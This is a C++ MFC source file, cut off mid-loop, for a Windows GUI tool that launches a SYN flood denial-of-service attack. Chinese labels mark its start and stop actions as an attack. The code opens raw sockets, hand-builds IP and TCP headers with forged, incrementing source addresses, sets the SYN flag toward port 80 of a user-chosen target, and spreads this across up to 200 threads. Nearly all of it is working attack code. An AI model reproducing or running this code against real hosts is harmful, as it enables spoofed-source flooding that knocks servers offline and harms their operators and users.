// floodDlg.cpp : implementation file
//
#include "stdafx.h"
#include "flood.h"
#include "floodDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
volatile int g_maxThread=0;
DWORD g_dwDestIP=0;
DWORD g_dwFakeIP=0;
/////////////////////////////////////////////////////////////////////////////
// CFloodDlg dialog
CFloodDlg::CFloodDlg(CWnd* pParent /*=NULL*/)
: CDialog(CFloodDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CFloodDlg)
m_strInfo = _T("==============\r\n作者:独孤寒哮\r\nQQ:23923886\r\nE-mail:blode@peoplemail.com.cn\r\n==============\r\n红一工作室\r\nhttp://10years.169dns.net");
m_nThread = 1;
//}}AFX_DATA_INIT
// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
m_bStart=FALSE;
m_dwThreadId.RemoveAll();
}
void CFloodDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CFloodDlg)
DDX_Control(pDX, IDC_EDIT_INFO, m_editInfo);
DDX_Control(pDX, IDC_IPADDRESS_FAKEIP, m_fakeIP);
DDX_Control(pDX, IDC_IPADDRESS_DESTIP, m_destIP);
DDX_Text(pDX, IDC_EDIT_INFO, m_strInfo);
DDX_Text(pDX, IDC_EDIT_THREAD, m_nThread);
DDV_MinMaxInt(pDX, m_nThread, 1, 200);
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CFloodDlg, CDialog)
//{{AFX_MSG_MAP(CFloodDlg)
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CFloodDlg message handlers
BOOL CFloodDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
m_fakeIP.SetAddress(1,10,1,1);
return TRUE; // return TRUE unless you set the focus to a control
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CFloodDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CFloodDlg::OnQueryDragIcon()
{
return (HCURSOR) m_hIcon;
}
USHORT checksum(USHORT *buffer, int size) //校验函数
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) {
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void CFloodDlg::OnOK()
{
if(!m_bStart){
UpdateData(TRUE);
if(m_nThread>200||m_nThread<1)
{
AfxMessageBox("线程数必须在1-200之间,不要开得太多了。");
return;
}
DWORD dstIP;
m_destIP.GetAddress(dstIP);
g_dwDestIP=dstIP;
m_fakeIP.GetAddress(dstIP);
g_dwFakeIP=dstIP;
/*
in_addr in;
in.S_un.S_addr=g_dwFakeIP;
CString s;
s=inet_ntoa(in);
in.S_un.S_addr=ntohl(g_dwFakeIP);
s=inet_ntoa(in);
//dstIP++;
in.S_un.S_addr=ntohl(dstIP+1);
s=inet_ntoa(in);
in.S_un.S_addr=htonl(dstIP+1);
s=inet_ntoa(in);
*/
m_bStart=TRUE;
CString str;
GetDlgItem(IDC_IPADDRESS_DESTIP)->EnableWindow(FALSE);
GetDlgItem(IDC_IPADDRESS_FAKEIP)->EnableWindow(FALSE);
GetDlgItem(IDC_EDIT_THREAD)->EnableWindow(FALSE);
GetDlgItem(IDOK)->SetWindowText("停止");
GetDlgItem(IDOK)->EnableWindow(FALSE);
str.Format("攻击开始...\r\n正在启动线程...\r\n==============\r\n");
m_editInfo.SetSel(0,-1);
m_editInfo.ReplaceSel(str);
for(int t=0;t<m_nThread;t++){
AfxBeginThread(FloodThread,this);
}
}
else{
m_bStart=!m_bStart;
//str.Format();
m_editInfo.SetSel(-1,-1);
m_editInfo.ReplaceSel("攻击停止...\r\n正在终止线程...\r\n==============\r\n");
//UpdateData(FALSE);
StopThread();
}
}
void CFloodDlg::StopThread() //停止线程
{
GetDlgItem(IDOK)->SetWindowText("开始");
GetDlgItem(IDOK)->EnableWindow(FALSE);
for(int t=0;t<m_dwThreadId.GetSize();t++){
PostThreadMessage(m_dwThreadId.GetAt(t),WM_STOP,0,0);
}
}
void CFloodDlg::OnCancel()
{
StopThread();
CDialog::OnCancel();
}
UINT FloodThread(LPVOID lParam)
{
CFloodDlg *pDlg=static_cast<CFloodDlg*>(lParam);
CString erStr;
DWORD t=GetCurrentThreadId();
pDlg->m_dwThreadId.Add(t); //get current thread id,and add to m_dwthreadid
g_maxThread++;
if(g_maxThread>=pDlg->m_nThread){ //在所以线程启动后,再启用“停止”按钮
pDlg->GetDlgItem(IDOK)->EnableWindow(TRUE);
}
erStr.Format("线程:%ld,已经启动.\r\n",t);
pDlg->m_editInfo.SetSel(-1,-1);
pDlg->m_editInfo.ReplaceSel(erStr);
SOCKET sock;
int to=2000,sendSeq=1;
char buf[128]={0};
sockaddr_in sin;
IP_HEADER ipHdr;
TCP_HEADER tcpHdr;
PSD_HEADER psdHdr;
if((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,0,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET){
erStr.Format("线程:%ld,WSASocket失败,代码:%d\r\n",t,WSAGetLastError());
pDlg->m_editInfo.SetSel(-1,-1);
pDlg->m_editInfo.ReplaceSel(erStr);
g_maxThread--;
return -1;
}
int flag=1;
//设置自填充IP头
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(const char *)&flag,sizeof(flag))==SOCKET_ERROR){
erStr.Format("线程:%ld,setsockopt失败,代码:%d\r\n",t,WSAGetLastError());
pDlg->m_editInfo.SetSel(-1,-1);
pDlg->m_editInfo.ReplaceSel(erStr);
g_maxThread--;
return -1;
}
//设置发送超时
if(setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(const char *)&to,sizeof(to))==SOCKET_ERROR){
erStr.Format("线程:%ld,setsockopt失败,代码:%d\r\n",t,WSAGetLastError());
pDlg->m_editInfo.SetSel(-1,-1);
pDlg->m_editInfo.ReplaceSel(erStr);
g_maxThread--;
return -1;
}
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=g_dwDestIP;
//填充IP首部
ipHdr.h_verlen=(4<<4 | sizeof(ipHdr)/sizeof(unsigned long));
//高四位IP版本号,低四位首部长度
ipHdr.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
//16位总长度(字节)
ipHdr.ident=1;
//16位标识
ipHdr.frag_and_flags=0;
//3位标志位
ipHdr.ttl=128;
//8位生存时间TTL
ipHdr.proto=IPPROTO_TCP; //8位协议(TCP,UDP…)
ipHdr.checksum=0; //16位IP首部校验和
ipHdr.sourceIP=htonl(g_dwFakeIP+sendSeq); //32位源IP地址
ipHdr.destIP=htonl(g_dwDestIP)/*inet_addr("218.75.161.220")*/; //32位目的IP地址
/*
in_addr in;
in.S_un.S_addr=ipHdr.sourceIP;
CString s;
s=inet_ntoa(in);
*/
//填充TCP首部
tcpHdr.th_sport=htons(6026); //源端口号
tcpHdr.th_dport=htons(80); //目的端口号
tcpHdr.th_seq=htonl(sendSeq); //SYN序列号
tcpHdr.th_ack=0; //ACK序列号置为0
tcpHdr.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCP长度和保留位
tcpHdr.th_flag=2; //SYN 标志
tcpHdr.th_win=htons(16384); //窗口大小
tcpHdr.th_urp=0; //偏移
tcpHdr.th_sum=0; //校验和
//填充TCP伪首部(用于计算校验和,并不真正发送)
psdHdr.saddr=ipHdr.sourceIP; //源地址
psdHdr.daddr=ipHdr.destIP; //目的地址
psdHdr.mbz=0;
psdHdr.ptcl=IPPROTO_TCP; //协议类型
psdHdr.tcpl=htons(sizeof(tcpHdr)); //TCP首部长度
MSG msg;
while(1){
if(::PeekMessage(&msg,0,WM_STOP,WM_STOP,PM_NOREMOVE)){
break;
}
memcpy(buf,&psdHdr,sizeof(psdHdr));
memcpy(buf+sizeof(psdHdr),&tcpHdr,sizeof(tcpHdr));
tcpHdr.th_sum=checksum((USHORT *)buf,sizeof(psdHdr)+sizeof(tcpHdr));
memcpy(buf,&ipHdr,sizeof(ipHdr));
memcpy(buf+sizeof(ipHdr),&tcpHdr,sizeof(tcpHdr));